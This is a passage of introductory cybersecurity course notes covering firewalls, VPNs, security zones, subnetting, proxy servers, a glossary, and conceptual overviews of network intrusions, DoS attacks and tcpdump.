understand what to consider when protecting wireless networks. It’s important that you understand the
vulnerabilities of each protocol and how important it is that devices on your network use the most upto-date security technologies.
Firewalls and Network Security Measures
In this video, you'll learn about different types of firewalls. These include hardware, software, and
cloud-based firewalls. You'll also learn the difference between a stateless and
stateful firewall and cover some of the basic operations that a firewall performs. Finally, you will
explore how proxy servers are used to add a layer of security to the network. A firewall is a
network security device that monitors traffic to and from your network. It either allows traffic or it
blocks it based on a defined set of security rules. A firewall can use port filtering, which blocks or
allows certain port numbers to limit unwanted communication. For example, it could have a rule
that only allows communications on port 443 for HTTPS or port 25 for email and blocks
everything else. These firewall settings will be determined by the organization's security policy.
Let's talk about a few different kinds of firewalls. A hardware firewall is considered the most basic
way to defend against threats to a network. A hardware firewall inspects each data packet before
it's allowed to enter the network. A software firewall performs the same functions as a hardware
firewall, but it's not a physical device. Instead, it's a software program installed on a computer or on
a server. If the software firewall is installed on a computer, it will analyze all the traffic received by
that computer. If the software firewall is installed on a server, it will protect all the devices
connected to the server. A software firewall typically costs less than purchasing a separate physical
device, and it doesn't take up any extra space. But because it is a software program, it will add some
processing burden to the individual devices. Organizations may choose to use a cloud-based
firewall. Cloud service providers offer firewalls as a service, or FaaS, for organizations. Cloud-based
firewalls are software firewalls hosted by a cloud service provider. Organizations can configure the
firewall rules on the cloud service provider's interface, and the firewall will perform security
operations on all incoming traffic before it reaches the organization’s onsite network. Cloud-based
firewalls also protect any assets or processes that an organization might be using in the cloud. All
the firewalls we have discussed can be either stateful or stateless. The terms "stateful" and
"stateless" refer to how the firewall operates. Stateful refers to a class of firewall that keeps track of
information passing through it and proactively filters out threats. A stateful firewall analyzes network
traffic for characteristics and behavior that appear suspicious and stops them from entering the
network. Stateless refers to a class of firewall that operates based on predefined rules and does not
keep track of information from data packets. A stateless firewall only acts according to
preconfigured rules set by the firewall administrator. The rules programmed by the firewall
administrator tell the device what to accept and what to reject. A stateless firewall doesn't store
analyzed information. It also doesn't discover suspicious trends like a stateful firewall does. For this
reason, stateless firewalls are considered less secure than stateful firewalls. A next generation
firewall, or NGFW, provides even more security than a stateful firewall. Not only does an NGFW
provide stateful inspection of incoming and outgoing traffic, but it also performs more in-depth
security functions like deep packet inspection and intrusion protection. Some NGFWs connect to
cloud-based threat intelligence services so they can quickly update to protect against emerging cyber
threats. Now you have a basic understanding of firewalls and how they work. We learned that
firewalls can be hardware or software. We also discussed the difference between a stateless and
stateful firewall and the security benefits of a stateful firewall. Finally, we discussed next generation
firewalls and the security benefits they provide.
Virtual Private Network
In this video, we're going to discuss how virtual private networks, or VPNs, add security to your
network. When you connect to the internet, your internet service provider receives your network's
requests and forwards it to the correct destination server. But your internet requests include your
private information. That means if the traffic gets intercepted, someone could potentially connect
your internet activity with your physical location and your personal information. This includes
some information that you want to keep private, like bank accounts and credit card numbers. A
virtual private network, also known as a VPN, is a network security service that changes your public
IP address and hides your virtual location so that you can keep your data private when you're using a
public network like the internet. VPNs also encrypt your data as it travels across the internet to
preserve confidentiality. A VPN service performs encapsulation on your data in transit.
Encapsulation is a process performed by a VPN service that protects your data by wrapping sensitive
data in other data packets. Previously, you learned how the MAC and IP address of the destination
device is contained in the header and footer of a data packet. This is a security threat because it
shows the IP and virtual location
of your private network. You could secure a data packet by encrypting it to make sure your
information can't be deciphered, but then network routers won't be able to read the IP and MAC
address to know where to send it to. This means you won't be able to connect to the internet site or
the service that you want. Encapsulation solves this problem while still maintaining your privacy.
VPN services encrypt your data packets and encapsulate them in other data packets that the routers
can read. This allows your network requests to reach their destination, but still encrypts your
personal data so it's unreadable while in transit. A VPN also uses an encrypted tunnel between your
device and the VPN server. The encryption is unhackable without a cryptographic key, so no one
can access your data. VPN services are simple and offer significant protection while you're on the
internet. With a VPN, you have the added assurance
that your data is encrypted, and your IP address and virtual location are unreadable
to malicious actors.
Security Zones
In this section, we'll discuss a type of network security feature called a security zone. Security zones
are a segment of a network that protects the internal network from the internet. They are a part of a
security technique called network segmentation that divides the network into segments. Each
network segment has its own access permissions and security rules. Security zones control who can
access different segments of a network. Security zones act as a barrier to internal networks,
maintain privacy within corporate groups, and prevent issues from spreading to the whole
network. One example of network segmentation is a hotel that offers free public Wi-Fi. The
unsecured guest network is kept separate from another encrypted network used by the hotel staff.
Additionally, an organization's network can be divided into subnetworks, or subnets, to maintain
privacy for each department in an organization. For instance, at a university, there may be a faculty
subnet and a separate student’s subnet. If there is contamination on the student's subnet, network
administrators can isolate it and keep the rest of the network free from contamination. An
organization's network is classified into two types of security zones. First, there's the uncontrolled
zone, which is any network outside of the organization's control, like the internet. Then, there's the
controlled zone, which is a subnet that protects the internal network from the uncontrolled zone.
There are several types of networks within the controlled zone. On the outer layer is the
demilitarized zone, or DMZ, which contains public-facing services that can access the internet. This
includes web servers, proxy servers that host websites for the public, and DNS servers that provide
IP addresses for internet users. It also includes email and file servers that handle external
communications. The DMZ acts as a network perimeter to the internal network. The internal
network contains private servers and data that the organization needs to protect. Inside the
internal network is another zone called the restricted zone. The restricted zone protects highly
confidential information that is only accessible to employees with certain privileges. Now, let's try to
picture these security zones. Ideally, the DMZ is situated between two firewalls. One of them filters
traffic outside the DMZ, and one of them filters traffic entering the internal network. This protects
the internal network with several lines of defense. If there's a restricted zone, that too would be
protected with another firewall. This way, attacks that penetrate the DMZ network cannot spread to
the internal network, and attacks that penetrate the internal network cannot access the restricted
zone. As a security analyst, you may be responsible for regulating access control policies on these
firewalls. Security teams can control traffic reaching the DMZ and the internal network by
restricting IPs and ports. For example, an analyst may ensure that only HTTPS traffic is allowed to
access web servers in the DMZ. Security zones are an important part of securing networks,
especially in large organizations. Understanding how they are used is essential for all security
analysts.
Subnetting and CIDR
Earlier in this course, you learned about network segmentation, a security technique that divides
networks into sections. A private network can be segmented to protect portions of the network from the
internet, which is an unsecured global network.
For example, you learned about the uncontrolled zone, the controlled zone, the demilitarized zone, and
the restricted zone. Feel free to review the video about security zones for a refresher on how network
segmentation can be used to add a layer of security to your organization’s network operations. Creating
security zones is one example of a networking strategy called subnetting.
Overview of subnetting
Subnetting is the subdivision of a network into logical groups called subnets. It works like a network
inside a network. Subnetting divides up a network address range into smaller subnets within the
network. These smaller subnets form based on the IP addresses and network mask of the devices on the
network. Subnetting creates a network of devices to function as their own network. This makes the
network more efficient and can also be used to create security zones. If devices on the same subnet
communicate with each other, the switch changes the transmissions to stay on the same subnet,
improving speed and efficiency of the communications.
Classless Inter-Domain Routing notation for subnetting
Classless Inter-Domain Routing (CIDR) is a method of assigning subnet masks to IP addresses to create a
subnet. Classless addressing replaces classful addressing. Classful addressing was used in the 1980s as a
system of grouping IP addresses into classes (Class A to Class E). Each class included a limited number
of IP addresses, which were depleted as the number of devices connecting to the internet outgrew the
classful range in the 1990s. Classless CIDR addressing expanded the number of available IPv4
addresses.
CIDR allows cybersecurity professionals to segment classful networks into smaller chunks. CIDR IP
addresses are formatted like IPv4 addresses, but they include a slash (“/’”) followed by a number at the
end of the address, This extra number is called the IP network prefix. For example, a regular IPv4
address uses the 198.51.100.0 format, whereas a CIDR IP address would include the IP network prefix at
the end of the address, 198.51.100.0/24. This CIDR address encompasses all IP addresses between
198.51.100.0 and 198.51.100.255. The system of CIDR addressing reduces the number of entries in
routing tables and provides more available IP addresses within networks. You can try converting CIDR
to IPv4 addresses and vice versa through an online conversion tool, like IPAddressGuide, for practice
and to better understand this concept.
Note: You may learn more about CIDR during your career, but it won't be covered in any additional
depth in this certificate program. For now, you only need a basic understanding of this concept.
Security benefits of subnetting
Subnetting allows network professionals and analysts to create a network within their own network
without requesting another network IP address from their internet service provider. This process uses
network bandwidth more efficiently and improves network performance. Subnetting is one component
of creating isolated subnetworks through physical isolation, routing configuration, and firewalls.
Key takeaways
Subnetting is a common security strategy used by organizations. Subnetting allows organizations to
create smaller networks within their private network. This improves the efficiency of the network and
can be used to create security zones.
Proxy Servers
Previously, we discussed how firewalls, VPNs, and security zones help to secure networks. Next,
we'll cover how to secure internal networks with proxy servers. Proxy servers are another system
that helps secure networks. The definition of a proxy server is a server that fulfills the request of a
client by forwarding them on to other servers. The proxy server is a dedicated server that sits
between the internet and the rest of the network. When a request to connect to the network comes
in from the internet, the proxy server will determine if the connection request is safe. The proxy
server is a public IP address that is different from the rest of the private network. This hides the
private network's IP address from malicious actors on the internet and adds a layer of security.
Let's examine how this will work with an example. When a client receives an HTTPS response, they
will notice a distorted IP address or no IP address rather than the real IP address of the
organization's web server. A proxy server can also be used to block unsafe websites that users
aren't allowed to access on an organization's network. A proxy server uses temporary memory to
store data that's regularly requested by external servers. This way, it doesn't have to fetch data
from an organization's internal servers every time. This enhances security by reducing contact with
the internal server. There are different types of proxy servers that support network security. This is
important for security analysts who monitor traffic from various proxy servers and may need to
know what purpose they serve. Let's explore some different types of proxy servers. A forward proxy
server regulates and restricts a person with access to the internet. The goal is to hide a user's IP
address and approve all outgoing requests. In the context of an organization, a forward proxy server
receives outgoing traffic from an employee, approves it, and then forwards it on to the destination on
the internet. A reverse proxy server regulates and restricts the internet access to an internal server.
The goal is to accept traffic from external parties, approve it, and forward it to the internal servers.
This setup is useful for protecting internal web servers containing confidential data from exposing
their IP address to external parties. An email proxy server is another valuable security tool. It filters
spam email by verifying whether a sender's address was forged. This reduces the risk of phishing
attacks that impersonate people known to the organization. Let's talk about a real world example of
an email proxy. Several years ago when I was working at a large U.S. broadband ISP, we used a
proxy server to implement multiple layers of anti-spam filtering before a message was allowed in
for delivery. It ended up tagging around 95% of messages as spam. The proxy servers would've
allowed us to filter and then scale those filters without impacting the underlying email platform.
Proxy servers play an important part in network security by filtering incoming and outgoing traffic
and staying alert to network attacks. These devices add a layer of protection from the unsecured
public network that we call the internet.
Virtual networks and privacy
This section of the course covered a lot of information about network operations. You reviewed the
fundamentals of network architecture and communication and can now use this knowledge as you learn
how to secure networks. Securing a private network requires maintaining the confidentiality of your
data and restricting access to authorized users.
In this reading, you will review several network security topics previously covered in the course,
including virtual private networks (VPNs), proxy servers, firewalls, and security zones. You'll continue
to learn more about these concepts and how they relate to each other as you continue through the
course.
Common network protocols
Network protocols are used to direct traffic to the correct device and service depending on the kind of
communication being performed by the devices on the network. Protocols are the rules used by all
network devices that provide a mutually agreed upon foundation for how to transfer data across a
network.
There are three main categories of network protocols: communication protocols, management
protocols, and security protocols.
1. Communication protocols are used to establish connections between servers. Examples include
TCP, UDP, and Simple Mail Transfer Protocol (SMTP), which provides a framework for email
communication.
2. Management protocols are used to troubleshoot network issues. One example is the Internet
Control Message Protocol (ICMP).
3. Security protocols provide encryption for data in transit. Examples include IPSec and SSL/TLS.
Some other commonly used protocols are:
●
●
●
HyperText Transfer Protocol (HTTP). HTTP is an application layer communication protocol. This
allows the browser and the web server to communicate with one another.
Domain Name System (DNS). DNS is an application layer protocol that translates, or maps, host
names to IP addresses.
Address Resolution Protocol (ARP). ARP is a network layer communication protocol that maps IP
addresses to physical machines or a MAC address recognized on the local area network.
Wi-Fi
This section of the course also introduced various wireless security protocols, including WEP, WPA,
WPA2, and WPA3. WPA3 encrypts traffic with the Advanced Encryption Standard (AES) cipher as it
travels from your device to the wireless access point. WPA2 and WPA3 offer two modes: personal and
enterprise. Personal mode is best suited for home networks while enterprise mode is generally utilized
for business networks and applications.
Network security tools and practices
Firewalls
Previously, you learned that firewalls are network virtual appliances (NVAs) or hardware devices that
inspect and can filter network traffic before it’s permitted to enter the private network. Traditional
firewalls are configured with rules that tell it what types of data packets are allowed based on the port
number and IP address of the data packet.
There are two main categories of firewalls.
●
●
Stateless: A class of firewall that operates based on predefined rules and does not keep track of
information from data packets
Stateful: A class of firewall that keeps track of information passing through it and proactively
filters out threats. Unlike stateless firewalls, which require rules to be configured in two
directions, a stateful firewall only requires a rule in one direction. This is because it uses a "state
table" to track connections, so it can match return traffic to an existing session
Next generation firewalls (NGFWs) are the most technologically advanced firewall protection. They
exceed the security offered by stateful firewalls because they include deep packet inspection (a kind of
packet sniffing that examines data packets and takes actions if threats exist) and intrusion prevention
features that detect security threats and notify firewall administrators. NGFWs can inspect traffic at the
application layer of the TCP/IP model and are typically application aware. Unlike traditional firewalls
that block traffic based on IP address and ports, NGFWs rules can be configured to block or allow traffic
based on the application. Some NGFWs have additional features like Malware Sandboxing, Network
Anti-Virus, and URL and DNS Filtering.
Proxy servers
A proxy server is another way to add security to your private network. Proxy servers utilize network
address translation (NAT) to serve as a barrier between clients on the network and external threats.
Forward proxies handle queries from internal clients when they access resources external to the
network. Reverse proxies function opposite of forward proxies; they handle requests from external
systems to services on the internal network. Some proxy servers can also be configured with rules, like a
firewall. For example, you can create filters to block websites identified as containing malware.
Virtual Private Networks (VPN)
A VPN is a service that encrypts data in transit and disguises your IP address. VPNs use a process called
encapsulation. Encapsulation wraps your encrypted data in an unencrypted data packet, which allows
your data to be sent across the public network while remaining anonymous. Enterprises and other
organizations use VPNs to help protect communications from users’ devices to corporate resources.
Some of these resources include servers or virtual machines that host business applications. Individuals
also use VPNs to increase personal privacy. VPNs protect user privacy by concealing personal
information, including IP addresses, from external servers. A reputable VPN also minimizes its own
access to user internet activity by using strong encryption and other security measures. Organizations
are increasingly using a combination of VPN and SD-WAN capabilities to secure their networks. A
software-defined wide area network (SD-WAN) is a virtual WAN service that allows organizations to
securely connect users to applications across multiple locations and over large geographical distances.
Key takeaways
There are three main categories of network protocols: communication, management, and security
protocols. In this reading, you learned the fundamentals of firewalls, proxy servers, and VPNs. More
organizations are implementing a cloud-based approach to network security by incorporating a
combination of VPN and SD-WAN capabilities as a service.
VPN protocols: Wireguard and IPSec
A VPN, or virtual private network, is a network security service that changes your public IP address and
hides your virtual location so that you can keep your data private when you’re using a public network
like the internet. VPNs provide a server that acts as a gateway between a computer and the internet.
This server creates a path similar to a virtual tunnel that hides the computer’s IP address and encrypts
the data in transit to the internet. The main purpose of a VPN is to create a secure connection between a
computer and a network. Additionally, a VPN allows trusted connections to be established on nontrusted networks. VPN protocols determine how the secure network tunnel is formed. Different VPN
providers provide different VPN protocols.
This reading will cover the differences between remote access and site-to-site VPNs, and two VPN
protocols: WireGuard VPN and IPSec VPN. A VPN protocol is similar to a network protocol: It’s a set of
rules or instructions that will determine how data moves between endpoints. An endpoint is any device
connected on a network. Some examples of endpoints include computers, mobile devices, and servers.
Remote access and site-to-site VPNs
Individual users use remote access VPNs to establish a connection between a personal device and a VPN
server. Remote access VPNs encrypt data sent or received through a personal device. The connection
between the user and the remote access VPN is established through the internet.
Enterprises use site-to-site VPNs largely to extend their network to other networks and locations. This is
particularly useful for organizations that have many offices across the globe. IPSec is commonly used in
site-to-site VPNs to create an encrypted tunnel between the primary network and the remote network.
One disadvantage of site-to-site VPNs is how complex they can be to configure and manage compared to
remote VPNs.
WireGuard VPN vs. IPSec VPN
WireGuard and IPSec are two different VPN protocols used to encrypt traffic over a secure network
tunnel. The majority of VPN providers offer a variety of options for VPN protocols, such as WireGuard or
IPSec. Ultimately, choosing between IPSec and WireGuard depends on many factors, including
connection speeds, compatibility with existing network infrastructure, and business or individual needs.
WireGuard VPN
WireGuard is a high-speed VPN protocol, with advanced encryption, to protect users when they are
accessing the internet. It’s designed to be simple to set up and maintain. WireGuard can be used for both
site-to-site connection and client-server connections. WireGuard is relatively newer than IPSec, and is
used by many people due to the fact that its download speed is enhanced by using fewer lines of code.
WireGuard is also open source, which makes it easier for users to deploy and debug. This protocol is
useful for processes that require faster download speeds, such as streaming video content or
downloading large files.
IPSec VPN
IPSec is another VPN protocol that may be used to set up VPNs. Most VPN providers use IPSec to encrypt
and authenticate data packets in order to establish secure, encrypted connections. Since IPSec is one of
the earlier VPN protocols, many operating systems support IPSec from VPN providers.
Although IPSec and WireGuard are both VPN protocols, IPSec is older and more complex than
WireGuard. Some clients may prefer IPSec due to its longer history of use, extensive security testing, and
widespread adoption. However, others may prefer WireGuard because of its potential for better
performance and simpler configuration.
Key Takeaways
A VPN protocol is similar to a network protocol: It’s a set of rules or instructions that will determine
how data moves between endpoints. There are two types of VPNs: remote access and site-to-site.
Remote access VPNs establish a connection between a personal device and a VPN server and encrypt or
decrypt data exchanged with a personal device. Enterprises use site-to-site VPNs largely to extend their
network to different locations and networks. IPSec can be used to create site-to-site connections and
WireGuard can be used for both site-to-site and remote access connections.
Remote Access VPN and Site-to-Site VPN are two common configurations used in the context of Virtual
Private Networks (VPNs). They serve different purposes and have distinct characteristics:
Remote Access VPN:
●
●
●
Purpose: Remote Access VPNs are primarily designed to provide secure access for individual
remote users or devices to a private network over the internet. These users could be employees,
contractors, or partners who need to connect to the corporate network from outside the
organization's physical premises.
Configuration:
● Each remote user typically has a VPN client installed on their device (e.g., laptop,
smartphone).
● The user initiates a VPN connection from their device to a VPN server or gateway
located within the organization's network.
● Once connected, the user's device becomes part of the private network and can access
internal resources, such as files, applications, or services.
Use Cases:
● Remote employees securely accessing company resources from home or while traveling.
Contractors or partners connecting to specific parts of the corporate network for
collaboration.
Security: Remote Access VPNs are highly secure, as they use strong encryption and
authentication methods to protect the data transmitted between the remote device and the
corporate network.
●
●
Site-to-Site VPN:
●
●
●
●
Purpose: Site-to-Site VPNs, also known as router-to-router VPNs, are used to establish secure
connections between two or more physical locations (typically office branches or data centers).
They enable these locations to communicate with each other as if they were on the same local
network.
Configuration:
● VPN routers or gateways are set up at each physical location.
● These routers establish encrypted tunnels between them over the internet.
● All traffic between the sites is routed through these tunnels, creating a seamless
network connection.
Use Cases:
● Interconnecting multiple office branches to share resources and data securely.
● Connecting a company's main data center to remote disaster recovery sites.
Security: Site-to-Site VPNs provide a high level of security, ensuring that all data transmitted
between the connected locations is encrypted and protected.
Key Differences:
●
●
●
●
Scope: Remote Access VPNs are designed for individual remote users or devices, while Site-toSite VPNs connect entire networks or physical locations.
Initiation: In Remote Access VPNs, individual users initiate the VPN connection from their
devices. In Site-to-Site VPNs, the connection is typically always on and established between
network routers or gateways.
Use Case: Remote Access VPNs are suitable for remote workers and individuals needing access
to specific resources. Site-to-Site VPNs are ideal for interconnecting physical locations or offices.
Security Focus: Both types of VPNs prioritize security, but Site-to-Site VPNs are more focused on
connecting networks securely, whereas Remote Access VPNs are tailored for securing individual
remote connections.
In summary, Remote Access VPNs are used for secure remote access to a network, while Site-to-Site
VPNs are used to connect multiple physical locations or networks together. The choice between the two
depends on the specific needs of an organization and its network architecture.
Glossary terms from module 2
Terms and definitions from Course 3, Module 2
Address Resolution Protocol (ARP): A network protocol used to determine the MAC address of the next
router or device on the path
Cloud-based firewalls: Software firewalls that are hosted by the cloud service provider
Controlled zone: A subnet that protects the internal network from the uncontrolled zone
Domain Name System (DNS): A networking protocol that translates internet domain names into IP
addresses
Encapsulation: A process performed by a VPN service that protects your data by wrapping sensitive data
in other data packets
Firewall: A network security device that monitors traffic to or from your network
Forward proxy server: A server that regulates and restricts a person’s access to the internet
Hypertext Transfer Protocol (HTTP): An application layer protocol that provides a method of
communication between clients and website servers
Hypertext Transfer Protocol Secure (HTTPS): A network protocol that provides a secure method of
communication between clients and servers
IEEE 802.11 (Wi-Fi): A set of standards that define communication for wireless LANs
Network protocols: A set of rules used by two or more devices on a network to describe the order of
delivery of data and the structure of data
Network segmentation: A security technique that divides the network into segments
Port filtering: A firewall function that blocks or allows certain port numbers to limit unwanted
communication
Proxy server: A server that fulfills the requests of its clients by forwarding them to other servers
Reverse proxy server: A server that regulates and restricts the internet's access to an internal server
Secure File Transfer Protocol (SFTP): A secure protocol used to transfer files from one device to another
over a network
Secure shell (SSH): A security protocol used to create a shell with a remote system
Security zone: A segment of a company’s network that protects the internal network from the internet
Simple Network Management Protocol (SNMP): A network protocol used for monitoring and managing
devices on a network
Stateful: A class of firewall that keeps track of information passing through it and proactively filters out
threats
Stateless: A class of firewall that operates based on predefined rules and does not keep track of
information from data packets
Subnetting: The subdivision of a network into logical groups called subnets
Transmission Control Protocol (TCP): An internet communication protocol that allows two devices to
form a connection and stream data
Uncontrolled zone: The portion of the network outside the organization
Virtual private network (VPN): A network security service that changes your public IP address and
masks your virtual location so that you can keep your data private when you are using a public network
like the internet
Wi-Fi Protected Access (WPA): A wireless security protocol for devices to connect to the internet
Network Intrusion Tactics
Now you'll learn how to secure networks, so that the valuable information they contain doesn't get
into the wrong hands. We're going to discuss how network intrusion tactics can present a threat to
networks and how a security analyst can protect against network attacks. Let's get started. Let's
start by answering the question, why do we need secure networks? As you've learned, networks are
constantly at risk of attack from malicious hackers. Attackers can infiltrate networks via malware,
spoofing, or packet sniffing. Network operations can also be disrupted
by attacks such as packet flooding. As we go along, you're going to learn about these and other
common network intrusion attacks in more detail. Protecting a network from these types of attacks
is important. If even one of them happens, it could have a catastrophic impact on an organization.
Attacks can harm an organization by leaking valuable or confidential information. They can also be
damaging to an organization's reputation and impact customer retention. Mitigating attacks may
also cost the organization money and time. Over the last few years, there have been several
examples of damage that cyber-attacks can cause. One notorious example was an attack against the
American home-improvement chain, Home Depot, in 2014. A group of hackers compromised and
infected Home Depot servers with malware. By the time network administrators shut down the
attack, the hackers had already taken the credit and debit card information for over 56 million
customers. Now, you know why it's so important to secure a network. But to keep a network secure,
you need to know what kinds of attacks to protect it from.
How intrusions compromise your system
In this section of the course, you learned that every network has inherent vulnerabilities and could
become the target of a network attack.
Attackers could have varying motivations for attacking your organization’s network. They may have
financial, personal, or political motivations, or they may be a disgruntled employee or an activist who
disagrees with the company's values and wants to harm an organization’s operations. Malicious actors
can target any network. Security analysts must be constantly alert to potential vulnerabilities in their
organization’s network and take quick action to mitigate them.
In this reading, you’ll learn about network interception attacks and backdoor attacks, and the possible
impacts these attacks could have on an organization.
Network interception attacks
Network interception attacks work by intercepting network traffic and stealing valuable information or
interfering with the transmission in some way.
Malicious actors can use hardware or software tools to capture and inspect data in transit. This is
referred to as packet sniffing. In addition to seeing information that they are not entitled to, malicious
actors can also intercept network traffic and alter it. These attacks can cause damage to an
organization’s network by inserting malicious code modifications or altering the message and
interrupting network operations. For example, an attacker can intercept a bank transfer and change the
account receiving the funds to one that the attacker controls.
Later in this course you will learn more about malicious packet sniffing, and other types of network
interception attacks: on-path attacks and replay attacks.
Backdoor attacks
A backdoor attack is another type of attack you will need to be aware of as a security analyst. An
organization may have a lot of security measures in place, including cameras, biometric scans and access
codes to keep employees from entering and exiting without being seen. However, an employee might
work around the security measures by finding a backdoor to the building that is not as heavily
monitored, allowing them to sneak out for the afternoon without being seen.
In cybersecurity, backdoors are weaknesses intentionally left by programmers or system and network
administrators that bypass normal access control mechanisms. Backdoors are intended to help
programmers conduct troubleshooting or administrative tasks. However, backdoors can also be
installed by attackers after they’ve compromised an organization to ensure they have persistent access.
Once the hacker has entered an insecure network through a backdoor, they can cause extensive damage:
installing malware, performing a denial of service (DoS) attack, stealing private information or changing
other security settings that leaves the system vulnerable to other attacks. A DoS attack is an attack that
targets a network or server and floods it with network traffic.
Possible impacts on an organization
As you’ve learned already, network attacks can have a significant negative impact on an organization.
Let’s examine some potential consequences.
●
●
●
Financial: When a system is taken offline with a DoS attack, or business operations are halted or
slowed down by some other tactic, they prevent a company from performing the tasks that
generate revenue. Depending on the size of an organization, interrupted operations can cost
millions of dollars. In addition, if a malicious actor gets access to the personal information of the
company’s clients or customers, the company may face heavy litigation and settlement costs if
customers seek legal recourse.
Reputation: Attacks can also have a negative impact on the reputation of an organization. If it
becomes public knowledge that a company has experienced a cyber attack, the public may
become concerned about the security practices of the organization. They may stop trusting the
company with their personal information and choose a competitor to fulfill their needs.
Public safety: If an attack occurs on a government network, this can potentially impact the safety
and welfare of the citizens of a country. In recent years, defense agencies across the globe are
investing heavily in combating cyber warfare tactics. If a malicious actor gained access to a
power grid, a public water system, or even a military defense communication system, the public
could face physical harm due to a network intrusion attack.
Key takeaways
Malicious actors are constantly looking for ways to exploit systems. They learn about new
vulnerabilities as they arise and attempt to exploit every vulnerability in a system. Attackers leverage
backdoor attack methods and network interception attacks to gain sensitive information they can use to
exploit an organization or cause serious damage. These types of attacks can impact an organization
financially, damage its reputation, and potentially put the public in danger. It is important that security
analysts stay educated to maintain network safety and reduce the likelihood and impact of these types of
attacks. Securing networks has never been more important.
Denial of Service (DoS) attacks
A denial of service attack is an attack that targets a network or server and floods it with
network traffic. The objective of a denial of service attack, or a DoS attack, is to disrupt normal business
operations by overloading an organization's network. The goal of the attack is to send so much
information to a network device that it crashes or is unable to respond to legitimate users. This means
that the organization won't be able to conduct their normal business operations, which can cost them
money and time. A network crash can also leave them vulnerable to other security
threats and attacks. A distributed denial of service attack, or DDoS, is a kind of DoS attack that uses
multiple devices or servers in different locations to flood the target network with unwanted traffic. Use of
numerous devices makes it more likely that the total amount of traffic sent will overwhelm the target
server. Remember, DoS stands for denial of service. So it doesn't matter what part of the network the
attacker overloads; if they overload anything, they win. An unfortunate example I've seen is an attacker
who crafted a very careful packet that caused a router to spend extra time processing the request. The
overall traffic volume didn't overload the router; the specifics within the packet did. Now we'll discuss
network level DoS attacks that target network bandwidth to slow traffic. Let's learn about three
common network level DoS attacks. The first is called a SYN flood attack. A SYN flood attack is a type of
DoS attack that simulates the TCP connection and floods the server with SYN packets. Let's break this
definition down a bit more by taking a closer look at the handshake process that is used to establish a
TCP connection between a device and a server. The first step in the handshake is for the device to send a
SYN, or synchronize, request to the server. Then, the server responds with a SYN/ACK packet to
acknowledge the receipt of the device's request and leaves a port open for the final step of the
handshake. Once the server receives the final ACK packet from the device, a TCP connection is
established. Malicious actors can take advantage of the protocol by flooding a server with SYN packet
requests for the first part of the handshake. But if the number of SYN requests is larger than the number
of available ports on the server, then the server will be overwhelmed and become unable to function.
Let's discuss two other common DoS attacks that use another protocol called ICMP. ICMP stands for
Internet
Control Message Protocol. ICMP is an internet protocol used by devices to tell each other about data
transmission errors across the network. Think of ICMP like a request for a status update
from a device. The device will return error messages if there is a network concern. You can think of this
like the ICMP request checking in with the device to make sure that all is well. An ICMP flood attack is a
type of DoS attack performed by an attacker repeatedly sending ICMP packets to a network server. This
forces the server to send an ICMP packet. This eventually uses up all the bandwidth for incoming and
outgoing traffic and causes the server to crash. Both attacks we've discussed so far, SYN flood and ICMP
flood, take advantage of communication protocols by sending an overwhelming number of requests.
There are also attacks that can overwhelm the server with one big request. One example that we'll
discuss is called the ping of death. A ping of death attack is a type of DoS attack that is caused when a
hacker pings a system by sending it an oversized ICMP packet that is bigger than 64 kilobytes, the
maximum size for a correctly formed ICMP packet. Pinging a vulnerable network server with an
oversized ICMP packet will overload the system and cause it to crash. Think of this like dropping a rock
on a small anthill. Each individual ant can carry a certain amount of weight while transporting food to
and from the anthill. But if a large rock is dropped on the anthill, then many ants will be crushed, and the
colony is unable to function until it rebuilds its operations elsewhere.
Read tcpdump logs
A network protocol analyzer, sometimes called a packet sniffer or a packet analyzer, is a tool designed to
capture and analyze data traffic within a network. They are commonly used as investigative tools to
monitor networks and identify suspicious activity. There are a wide variety of network protocol
analyzers available, but some of the most common analyzers include:
●
●
●
●
●
SolarWinds NetFlow Traffic Analyzer
ManageEngine OpManager
Azure Network Watcher
Wireshark
tcpdump
This reading will focus exclusively on tcpdump, though you can apply what you learn here to many of
the other network protocol analyzers you'll use as a cybersecurity analyst to defend against any network
intrusions. In an upcoming activity, you’ll review a tcpdump data traffic log and identify a DoS attack to
practice these skills.
tcpdump
tcpdump is a command-line network protocol analyzer. It is popular, lightweight–meaning it uses little
memory and has a low CPU usage–and uses the open-source libpcap library. tcpdump is text based,
meaning all commands in tcpdump are executed in the terminal. It can also be installed on other Unixbased operating systems, such as macOS®. It is preinstalled on many Linux distributions.
tcpdump provides a brief packet analysis and converts key information about network traffic into
formats easily read by humans. It prints information about each packet directly into your terminal.
tcpdump also displays the source IP address, destination IP addresses, and the port numbers being used
in the communications.
Interpreting output
tcpdump prints the output of the command as the sniffed packets in the command line, and optionally to
a log file, after a command is executed. The output of a packet capture contains many pieces of
important information about the network traffic.
Some information you receive from a packet capture includes:
●
●
●
●
●
Timestamp: The output begins with the timestamp, formatted as hours, minutes, seconds, and
fractions of a second.
Source IP: The packet’s origin is provided by its source IP address.
Source port: This port number is where the packet originated.
Destination IP: The destination IP address is where the packet is being transmitted to.
Destination port: This port number is where the packet is being transmitted to.
Note: By default, tcpdump will attempt to resolve host addresses to hostnames. It'll also replace port
numbers with commonly associated services that use these ports.
Common uses
tcpdump and other network protocol analyzers are commonly used to capture and view network
communications and to collect statistics about the network, such as troubleshooting network
performance issues. They can also be used to:
●
●
●
●
Establish a baseline for network traffic patterns and network utilization metrics.
Detect and identify malicious traffic
Create customized alerts to send the right notifications when network issues or security threats
arise.
Locate unauthorized instant messaging (IM), traffic, or wireless access points.
However, attackers can also use network protocol analyzers maliciously to gain information about a
specific network. For example, attackers can capture data packets that contain sensitive information,
such as account usernames and passwords. As a cybersecurity analyst, It’s important to understand the
purpose and uses of network protocol analyzers.
Key takeaways
Network protocol analyzers, like tcpdump, are common tools that can be used to monitor network
traffic patterns and investigate suspicious activity. tcpdump is a command-line network protocol
analyzer that is compatible with Linux/Unix and macOS®. When you run a tcpdump command, the tool
will output packet routing information, like the timestamp, source IP address and port number, and the
destination IP address and port number. Unfortunately, attackers can also use network protocol
analyzers to capture data packets that contain sensitive information, such as account usernames and
passwords.
Real-life DDoS attack
Previously, you were introduced to Denial of Service (DoS) attacks. You also learned that volumetric
distributed DoS (DDoS) attacks overwhelm a network by sending unwanted data packets in such large
quantities that the servers become unable to service normal users. This can be detrimental to an
organization. When systems fail, organizations cannot meet their customers' needs. They often lose
money, and in some cases, incur other losses. An organization’s reputation may also suffer if news of a
successful DDoS attack reaches consumers, who then question the security of the organization.
In this reading you’ll learn about a 2016 DDoS attack against DNS servers that caused major outages at
multiple organizations that have millions of daily users.
A DDoS targeting a widely used DNS server
In previous videos, you learned about the function of a DNS server. As a review, DNS servers translate
